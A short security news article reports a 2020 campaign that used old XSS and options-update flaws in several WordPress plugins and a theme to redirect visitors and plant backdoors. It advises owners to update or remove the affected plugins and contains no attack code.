More than 900,000 WordPress sites have been attacked in a new attack campaign that aims to redirect visitors to malicious sites or plant backdoors in a theme header if an administrator is logged in. Most of these attacks appear to be the work of a single threat actor based on the malicious JavaScript payload that they attempt to inject into vulnerable sites. The attacker also exploited old vulnerabilities that allowed them to modify a site's home URL to the same domain used in the cross-site scripting (XSS) payload to redirect visitors to malicious sites. In a blog post, Senior QA at Defiant, Ram Gall provided additional insight into the scale of the campaign, stating: "While our records show that this threat actor may have delivered a lower volume of attacks in the past, it is only in the last few days that have really increased, to the point that more than 20 million attacks were attempted against more than half a million individual sites on May 3, 2020. In the last month in total, we have detected that more than 24,000 addresses Separate IPs sent requests matching these attacks on more than 900,000 sites.
Target old WordPress vulnerabilities
According to Gall, the attacker has targeted several vulnerabilities in WordPress plugins that have been removed from official repositories or fixed in recent years. More than half of all attacks targeted sites with the Easy2Map plugin, which contains an XSS vulnerability. Although the plugin was removed from the WordPress repository in August 2019, it is still installed on less than 3000 sites. The attacker also exploited an XSS vulnerability in the Blog Designer plugin that was fixed in 2019 and the Newspaper theme that was fixed in 2016. To modify a site's host URL, the attacker exploited an options update vulnerability in the plugins. WP GDPR Compliance and Total Donations. WP GDPR Compliance has over 100,000 installs, but Defiant estimates that only 5,000 vulnerable installs remain. However, the full donation was permanently removed from Envato Market in early 2019 and there are an estimated fewer than 1,000 total installs left. If your site uses one of these plugins or themes, it is highly recommended that you update them immediately and remove the ones that are no longer in the official WordPress repository. Via BleepingComputer